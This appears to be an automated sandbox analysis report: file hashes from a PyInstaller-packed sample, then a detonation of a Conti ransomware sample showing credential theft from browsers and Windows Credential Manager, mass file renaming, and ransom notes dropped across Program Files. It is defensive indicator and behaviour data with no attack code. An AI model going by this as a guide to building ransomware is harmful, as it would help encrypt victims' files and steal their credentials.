C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-time-l1-1-0.dll

MD5	0d9afb006f46478008c180b9da5465ac
SHA1	3be2f543bbc8d9f1639d0ed798c5856359a9f29b
SHA256	c3a70153e1d0ecd1cbf95de033bfef5cfecabe7a8274cafe272cc2c14865cd8c
SHA512	4bd76efcb2432994d10884c302aee6cadbc2d594bbbd4e654c1e8547a1efd76fd92e4879b8120dfacb5e8a77826009f72faa5727b1aa559ed3fc86d0ce3ed029

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-environment-l1-1-0.dll

MD5	e48a1860000fd2bd61566e76093984f5
SHA1	aa3f233fb19c9e7c88d4307bade2a6eef6518a8a
SHA256	67bbb287b2e9057bf8b412ad2faa266321ac28c6e6ba5f22169e2517a3ead248
SHA512	46b384c45d2fe2b70a5ac8ee087ba55828a62ccab876a21a3abd531d4de5ec7be21ff34b2284e0231b6cf0869eba09599c3b403db84448f20bd0fff88c1956d5

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-conio-l1-1-0.dll

MD5	75e626c3ebf160ebe75c59d3d6ac3739
SHA1	02a99199f160020b1086cec6c6a2983908641b65
SHA256	762ca8dd14f8ff603d06811ba904c973a684022202476bca45e9dc1345151ac4
SHA512	5ad205b90ac1658c5b07f6f212a82be8792999b68f9c9617a1298b04d83e7fcb9887ed307a9d31517bcba703b3ee6699ea93f67b06629355ea6519fed0a6d29a

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-filesystem-l1-1-0.dll

MD5	1193f810519fbc07beb3ffbad3247fc4
SHA1	db099628a19b2d34e89028c2e16bc89df28ed78f
SHA256	ab2158fe6b354fb429f57f374ca25105b44e97edcbdc1b752650d895dadd6fd1
SHA512	3222a10c3be5098aca0211015efe75cfbcd408fd28315acedd016d8f77513f81e207536b072001525965635da39c4aae8ef9f6ad367f5d695de67b1614179353

\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-process-l1-1-0.dll

MD5	d8a5c1960281ec59fd4164c983516d7c
SHA1	29e6feff9fb16b9d8271b7da6925baf3c6339d06
SHA256	12bb3f480ec115d5f9447414525c5dcd236ed48356d5a70650541c9499bc4d19
SHA512	c97aa4029bcd8ffc490547dd78582ac81049dded2288102b800287a7fb623d9fde327702f8a24dfe2d2d67b2c9aaf97050756474faa4914ca4cb6038449c64bf

C:\Users\Admin\AppData\Local\Temp\_MEI12922\base_library.zip

MD5	a70f10b994f5b2e03777b4d355eef788
SHA1	141be3cef837cf6120f71c714259d9799586b483
SHA256	766089d80d0136ce9a4f24f1dd717a8575b0075c5d9c3c72b84807e0647ffa2c
SHA512	5651e26f0a3de35e455977d3cfc06e2b38defe5e52656e3213177a0a621eca3b3391bf414371cecf88d9ff903747231092b8d1d2206d5f020e1c438c70d8eb38

C:\Users\Admin\AppData\Local\Temp\_MEI12922\_ctypes.pyd

MD5	5e869eebb6169ce66225eb6725d5be4a
SHA1	747887da0d7ab152e1d54608c430e78192d5a788
SHA256	430f1886caf059f05cde6eb2e8d96feb25982749a151231e471e4b8d7f54f173
SHA512	feb6888bb61e271b1670317435ee8653dedd559263788fbf9a7766bc952defd7a43e7c3d9f539673c262abedd97b0c4dd707f0f5339b1c1570db4e25da804a16

C:\Users\Admin\AppData\Local\Temp\_MEI12922\_socket.pyd

MD5	8ea18d0eeae9044c278d2ea7a1dbae36
SHA1	de210842da8cb1cb14318789575d65117d14e728
SHA256	9822c258a9d25062e51eafc45d62ed19722e0450a212668f6737eb3bfe3a41c2
SHA512	d275ce71d422cfaacef1220dc1f35afba14b38a205623e3652766db11621b2a1d80c5d0fb0a7df19402ebe48603e76b8f8852f6cbff95a181d33e797476029f0

C:\Users\Admin\AppData\Local\Temp\_MEI12922\select.pyd

MD5	fb4a0d7abaeaa76676846ad0f08fefa5
SHA1	755fd998215511506edd2c5c52807b46ca9393b2
SHA256	65a3c8806d456e9df2211051ed808a087a96c94d38e23d43121ac120b4d36429
SHA512	f5b3557f823ee4c662f2c9b7ecc5497934712e046aa8ae8e625f41756beb5e524227355316f9145bfabb89b0f6f93a1f37fa94751a66c344c38ce449e879d35f

C:\Users\Admin\AppData\Local\Temp\_MEI12922\pywintypes37.dll

MD5	77b6875977e77c4619bbb471d5eaf790
SHA1	f08c3bc5e918c0a197fbfd1b15e7c0491bd5fade
SHA256	780a72ba3215ff413d5a9e98861d8bb87c15c43a75bb81dc985034ae7dcf5ef6
SHA512	783939fc97b2445dfe7e21eb6b71711aba6d85e275e489eddcc4f20c2ed018678d8d14c9e1856f66e3876f318312d69c22cee77f9105a72e56a1be4f3e8a7c2e

C:\Users\Admin\AppData\Local\Temp\_MEI12922\_ssl.pyd

MD5	5a393bb4f3ae499541356e57a766eb6a
SHA1	908f68f4ea1a754fd31edb662332cf0df238cf9a
SHA256	b6593b3af0e993fd5043a7eab327409f4bf8cdcd8336aca97dbe6325aefdb047
SHA512	958584fd4efaa5dd301cbcecbfc8927f9d2caec9e2826b2af9257c5eefb4b0b81dbbadbd3c1d867f56705c854284666f98d428dc2377ccc49f8e1f9bbbed158f

C:\Users\Admin\AppData\Local\Temp\_MEI12922\libcrypto-1_1.dll

MD5	cc4cbf715966cdcad95a1e6c95592b3d
SHA1	d5873fea9c084bcc753d1c93b2d0716257bea7c3
SHA256	594303e2ce6a4a02439054c84592791bf4ab0b7c12e9bbdb4b040e27251521f1
SHA512	3b5af9fbbc915d172648c2b0b513b5d2151f940ccf54c23148cd303e6660395f180981b148202bef76f5209acc53b8953b1cb067546f90389a6aa300c1fbe477

C:\Users\Admin\AppData\Local\Temp\_MEI12922\api-ms-win-crt-utility-l1-1-0.dll

MD5	9b622ca5388b6400705c8f21550bae8e
SHA1	eb599555448bf98cdeabc2f8b10cfe9bd2181d9f
SHA256	af1e1b84f066ba05da20847bffd874d80a810b5407f8c6647b3ff9e8f7d37863
SHA512	9872f54ac744cf537826277f1c0a3fd00c5aa51f353692c1929be7bc2e3836e1a52cab2c467ba675d4052ac3116f5622755c3db8be389c179f7d460391105545

C:\Users\Admin\AppData\Local\Temp\_MEI12922\libssl-1_1.dll

MD5	bc778f33480148efa5d62b2ec85aaa7d
SHA1	b1ec87cbd8bc4398c6ebb26549961c8aab53d855
SHA256	9d4cf1c03629f92662fc8d7e3f1094a7fc93cb41634994464b853df8036af843
SHA512	80c1dd9d0179e6cc5f33eb62d05576a350af78b5170bfdf2ecda16f1d8c3c2d0e991a5534a113361ae62079fb165fff2344efd1b43031f1a7bfda696552ee173

C:\Users\Admin\AppData\Local\Temp\_MEI12922\_hashlib.pyd

MD5	b32cb9615a9bada55e8f20dcea2fbf48
SHA1	a9c6e2d44b07b31c898a6d83b7093bf90915062d
SHA256	ca4f433a68c3921526f31f46d8a45709b946bbd40f04a4cfc6c245cb9ee0eab5
SHA512	5c583292de2ba33a3fc1129dfb4e2429ff2a30eeaf9c0bcff6cca487921f0ca02c3002b24353832504c3eec96a7b2c507f455b18717bcd11b239bbbbd79fadbe

C:\Users\Admin\AppData\Local\Temp\_MEI12922\_tkinter.pyd

MD5	09f66528018ffef916899845d6632307
SHA1	cf9ddad46180ef05a306dcb05fdb6f24912a69ce
SHA256	34d89fe378fc10351d127fb85427449f31595eccf9f5d17760b36709dd1449b9
SHA512	ed406792d8a533db71bd71859edbb2c69a828937757afec1a83fd1eacb1e5e6ec9afe3aa5e796fa1f518578f6d64ff19d64f64c9601760b7600a383efe82b3de

C:\Users\Admin\AppData\Local\Temp\_MEI12922\tcl86t.dll

MD5	c0b23815701dbae2a359cb8adb9ae730
SHA1	5be6736b645ed12e97b9462b77e5a43482673d90
SHA256	f650d6bc321bcda3fc3ac3dec3ac4e473fb0b7b68b6c948581bcfc54653e6768
SHA512	ed60384e95be8ea5930994db8527168f78573f8a277f8d21c089f0018cd3b9906da764ed6fcc1bd4efad009557645e206fbb4e5baef9ab4b2e3c8bb5c3b5d725

C:\Users\Admin\AppData\Local\Temp\_MEI12922\tk86t.dll

MD5	fdc8a5d96f9576bd70aa1cadc2f21748
SHA1	bae145525a18ce7e5bc69c5f43c6044de7b6e004
SHA256	1a6d0871be2fa7153de22be008a20a5257b721657e6d4b24da8b1f940345d0d5
SHA512	816ada61c1fd941d10e6bb4350baa77f520e2476058249b269802be826bab294a9c18edc5d590f5ed6f8dafed502ab7ffb29db2f44292cb5bedf2f5fa609f49c

memory/2928-1099-0x0000000002B10000-0x0000000002B90000-memory.dmp

memory/2928-1100-0x000000001B710000-0x000000001B9F2000-memory.dmp

memory/2928-1101-0x0000000002860000-0x0000000002868000-memory.dmp

C:\MSOCache\All Users\decrypt_file.TxT

MD5	add738a2b9979dc7d3fd80f14abed5af
SHA1	48e174e234ea5ef5350887fd9818670d78d372c8
SHA256	04ae607bed911af10705cb9ee695564057d3856125d30abe1a53617568d9b323
SHA512	25ef9632df6aa2423d548af98ce6b1ff2a5aea70a28062ff9f0cf83701fdc512d16338bfbb77cb17ac8f78d978c8fc9e85c6aff5e04a9ecb722b50019c61e566

Analysis: behavioral14

Detonation Overview

Submitted

2024-07-28 16:38

Reported

2024-07-28 16:43

Platform

win10v2004-20240709-en

Max time kernel

146s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

Signatures

Conti Ransomware

ransomware conti

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Renames multiple (7396) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description	Indicator	Process	Target
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description	Indicator	Process	Target
File opened for modification	C:\Users\Public\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Searches\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Libraries\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A

Drops file in Program Files directory

Description	Indicator	Process	Target
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\CHICAGO.XSL	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SLATE\PREVIEW.GIF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTest-pl.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\skins\skin.catalog	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\PlatformCapabilities\ExcelCapabilities.json	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\versions\framework-dev.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\README.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-pl.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\ui-strings.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ja-jp\ui-strings.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\pt-BR\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_newfolder_18.svg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\zh-tw\AppStore_icon.svg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Retail-ul-phn.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons_retina.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_zh_cn_135x40.svg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\SupplementalDictionaries\en_US\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nl-nl\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\illustrations_retina.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-hk_get.svg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files\Common Files\System\ado\en-US\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-100.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\THMBNAIL.PNG	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msmdsrv.rll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files\VideoLAN\VLC\locale\ka\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sm\LC_MESSAGES\vlc.mo	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nl-nl\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Resources\1033\msmdsrvi_xl.rll	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\ui-strings.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\vlc.mo	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\AUTHORS.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\spectrum_spinner_process.svg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-80.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\th.pak.DATA	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-gb\ui-strings.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTest-ul-oob.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\ui-strings.js	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\UndoOpen.docm	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-ppd.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription2-ppd.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_F_COL.HXK	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-sl\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\nl_get.svg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-pl.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\it\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019VL_MAK_AE-ul-phn.xrm-ms	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
